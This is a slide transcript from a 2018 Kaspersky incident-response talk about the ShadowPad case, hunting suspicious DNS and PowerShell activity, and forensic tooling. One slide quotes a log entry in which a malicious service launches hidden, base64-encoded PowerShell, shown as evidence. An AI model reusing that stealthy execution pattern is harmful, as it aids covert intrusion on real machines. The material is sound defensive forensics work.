Sergey Golovanov - Indecent Response 2018

Transcript

1. Indecent response 2018 Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky

   Lab

2. Challenge: find a SDC bus speed

3. None

4. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

5. 1.Shadowpad

6. Case overview: 1.Antifraud system in a bank is detecting printing

   of a lot of elite cards for the last several hours 2.Bank is starting network audit 3.Bank is discovering suspicion DNS requests 4.Forensics can not find malware on PCs 5.Bank asks for help…

7. DNS requests

8. None
9. None

10. “Our worldwide customers range from small businesses right up to

    global Fortune 500 companies.” NetSarang AmericanExpress BankofAmericaCorp. BankofChina BNPParibas Citigroup DeutscheBank Fortis GeneralElectric INGGroup MerrillLynch MorganStanley ShinhanFinancialGroup SocieteGenerale UBS https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru

11. https://securelist.com/shadowpad -in-corporate-networks/81432/

12. What was done?

13. AutoMA – static analysis framework

14. Shadowpad after autoMA

15. Miniduke after autoMA

16. 2.0x403AA91EE

17. Case overview:

18. None
19. None

20. How to find suspicion DNS requests? sort | uniq -c

    | sort -rn

21. How to find suspicion powershell? sort | uniq -c |

    sort -rn

22. parse_evtx.exe System.evtx | findstr /i "power" | more Record #2396788

    2027.02.22-08:03:00 'Computer':PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':‘GUID'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A FMAdAByAGUAYQBtACgA

23. https://github.com/KasperskyLab/ForensicsTools/

24. 3.Scanner2

25. Case overview: 1. No money 2. No logs 3. No

    team 4. No idea about network 5. CISO!

26. What to do? we need logs we need mfts we

    need regs

27. WE NEED TO RECOMPILE EVERYTHING!

28. Awesome batch file

29. How to find something suspicion ? sort | uniq -c

    | sort -rn

30. https://cdn.securelist.com/files/ 2017/12/HappyNewYear.zip

31. 4. PLANS

32. 1. MFT is a hell. Sleuthkit is not enough. We

    need more data about deleted files. 2. USN J is required with no HDD touch. 3. Reg analysis is needed with unallocated part.

33. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

34. Зачем?

35. None

36. Thank you! Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky Lab